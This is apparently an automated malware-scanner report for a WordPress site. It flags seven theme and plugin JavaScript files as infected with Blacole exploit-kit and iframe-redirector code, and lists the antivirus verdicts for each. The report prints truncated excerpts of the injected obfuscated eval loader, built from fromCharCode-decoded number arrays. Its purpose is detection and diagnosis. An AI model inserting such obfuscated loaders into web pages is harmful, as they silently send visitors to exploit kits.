New scan:

Malware Scanner report for elite-catalogue.ru

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "elite-catalogue.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=elite-catalogue.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://elite-catalogue.ru/
200 OK
Content-Length: 53915
Content-Type: text/html
clean
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery-1.3.1.min.js
200 OK
Content-Length: 58704
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
... 6335 bytes are skipped ...
p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-694!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

AntiVir
JS/Blacole.CP
Avast
JS:Iframe-TD [Trj]
Ikarus
Exploit.JS.Blacole
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Blacole.G
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.Redirector.144
Kaspersky
Trojan-Downloader.JS.Iframe.dbr
Microsoft
Exploit:JS/Blacole.HY
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
F-Prot
JS/Redir.NZ
Norman
Iframe.QJ
GData
JS:Iframe-TD
Commtouch
JS/Redir.NZ

http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery-custom.js
200 OK
Content-Length: 6442
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$(document).ready(function() {
$('a#options').click(function (){
if (($('.layout_options')).is(':hidden')) {
$('#wrapper').fadeTo('fast', 0.33);
$('.layout_options').fadeIn('normal');
} else {
$('#wrapper').fadeTo('fast', 1.0);
$('.layout_options').fadeOut('normal');
}
});
$('a#reset').click(function() {
$('.cat-widget').each( function() {$.cookie($(this).attr('id'), null, { path: '/', expires: 100 }); $(this).show()});
$('.box_a').each( fun
... 6468 bytes are skipped ...
p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-694!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

AntiVir
JS/Blacole.CP
Avast
JS:Iframe-TD [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.Crypt.IM
Emsisoft
JS:Trojan.Crypt.IM (B)
Comodo
TrojWare.JS.Blacole.G
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.Redirector.144
Kaspersky
Trojan-Downloader.JS.Iframe.dbr
Microsoft
Exploit:JS/Blacole.HY
Fortinet
JS/Crypt.BBDN!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Secure
JS:Trojan.Crypt.IM
Norman
Agent.AKVHD
GData
JS:Trojan.Crypt.IM
BitDefender
JS:Trojan.Crypt.IM

http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/tabs.js
200 OK
Content-Length: 12326
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function ddtabcontent(tabinterfaceid){
this.tabinterfaceid=tabinterfaceid this.tabs=document.getElementById(tabinterfaceid).getElementsByTagName("a") this.enabletabpersistence=true
this.hottabspositions=[] this.currentTabIndex=0 this.subcontentids=[] this.revcontentids=[] this.selectedClassTarget="link" }
ddtabcontent.getCookie=function(Name){
var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] retu
... 6393 bytes are skipped ...
p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-700!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

AntiVir
JS/Blacole.CP
Avast
JS:Iframe-TD [Trj]
Ikarus
Exploit.JS.Blacole
K7AntiVirus
Trojan
Comodo
TrojWare.JS.Blacole.G
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.Redirector.144
Kaspersky
Trojan-Downloader.JS.Iframe.dbr
Microsoft
Exploit:JS/Blacole.HY
Fortinet
JS/Crypt.BBDN!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
F-Prot
JS/Redir.NZ
GData
JS:Iframe-TD
Commtouch
JS/Redir.NZ

http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/clear-input.js
200 OK
Content-Length: 4204
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function clearInput (cssClass) {
var focusField = $(cssClass);

focusField.focus( function(){
var el = $(this);
var val = el.val();

if (!el.data('placeholder')) {
el.data('placeholder', val);
}

if(val === el.data('placeholder')) {
el.val('');
}
});

focusField.blur( function () {
var el = $(this);
if (el.val() === '') {
el.val(el.data('placeholder') || '');
}
});<
... 8471 bytes are skipped ...
p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-692!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

K7AntiVirus
Trojan
DrWeb
JS.IFrame.233
Microsoft
Trojan:JS/Redirector.LD
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Prot
JS/Redir.NZ
Commtouch
JS/Redir.NZ

http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery.cookie.js
200 OK
Content-Length: 3456
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75
... 8052 bytes are skipped ...
p;121&&125&&116&&57&&131&&116&&130&&122&&128&&133&&57&&76&&29&&27&&25&&26&&141&&30&&26&&26&&141&&76&&29&&27&&141&&58&&56&&58&&75".split("&&");h=2;s="";if(m)for(i=0;i-699!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-ANL [Trj]
DrWeb
JS.IFrame.233
Microsoft
Trojan:JS/Redirector.LD
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Prot
JS/Redir.NZ
Commtouch
JS/Redir.NZ

http://elite-catalogue.ru/wp-includes/js/jquery/jquery.js?ver=1.3.2
200 OK
Content-Length: 57278
Content-Type: application/x-javascript
clean
http://elite-catalogue.ru/wp-content/themes/wp-comfy/javascript/date.js
200 OK
Content-Length: 4072
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var mydate=new Date()
var year=mydate.getYear()
if (year < 1000)
year+=1900
var day=mydate.getDay()
var month=mydate.getMonth()
var daym=mydate.getDate()
if (daym<10)
daym="0"+daym
var dayarray=new Array("воскресенье","понедельник","вторник","среда","четверг","пятница","суббота")
var montharray=new Array("января","февраля","марта","апреля","мaя","июня","июля","а
... 8722 bytes are skipped ...
p;121&&125&&116&&57&&131&&116&&130&&122&&128&&133&&57&&76&&29&&27&&25&&26&&141&&30&&26&&26&&141&&76&&29&&27&&141&&58&&56&&58&&75".split("&&");h=2;s="";if(m)for(i=0;i-699!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-ANL [Trj]
DrWeb
JS.IFrame.233
Microsoft
Trojan:JS/Redirector.LD
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Prot
JS/Redir.NZ
Commtouch
JS/Redir.NZ

http://autocontext.begun.ru/autocontext2.js
200 OK
Content-Length: 249
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19468
Content-Type: text/javascript
clean
http://counter.rambler.ru/top100.jcn?1818835
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://elite-catalogue.ru/wp-content/plugins/shutter-reloaded/shutter-reloaded.js?ver=2.4
200 OK
Content-Length: 11499
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var shutterLinks={},shutterSets={};function shutterAddLoad(a){if("undefined"!=typeof jQuery){jQuery(document).ready(a())}else{if(typeof window.onload!="function"){window.onload=a}else{oldonld=window.onload;window.onload=function(){if(oldonld){oldonld()}a()}}}}shutterReloaded={I:function(b){return document.getElementById(b)},settings:function(){var a=this,b=shutterSettings;a.L10n=b.L10n||["Previous","Next","Close","Full Size","Fit to Screen","Image","of","Loading..."];a.imageCount=b.imageCount||0
... 6342 bytes are skipped ...
p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-700!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-ANL [Trj]
Ikarus
Trojan.JS.Redirector
TrendMicro-HouseCall
TROJ_GEN.F47V0401
DrWeb
JS.IFrame.233
Microsoft
Trojan:JS/Redirector.LD
NANO-Antivirus
Trojan.Script.Blacole.tfthc
F-Prot
JS/Redir.NZ
GData
Script.Trojan.Agent.BREL3G
Commtouch
JS/Redir.NZ

http://elite-catalogue.ru/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.50
404 Not Found
Content-Length: 140047
Content-Type: text/html
clean
http://elite-catalogue.ru/wp-content/plugins/wp-postratings/
403 Forbidden
Content-Length: 508
Content-Type: text/html
clean
http://elite-catalogue.ru/test404page.js
404 Not Found
Content-Length: 140001
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: elite-catalogue.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 03:04:25 GMT
Pragma: no-cache
Server: nginx/1.0.12
Vary: Accept-Encoding
Vary: Cookie,Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aec740103188c44da3d232a8b10220e0; path=/
X-Pingback: http://elite-catalogue.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-XRDS-Location: http://elite-catalogue.ru/?xrds
X-Yadis-Location: http://elite-catalogue.ru/?xrds
Second query (visit from search engine):
GET / HTTP/1.1
Host: elite-catalogue.ru
Referer: http://www.google.com/search?q=elite-catalogue.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.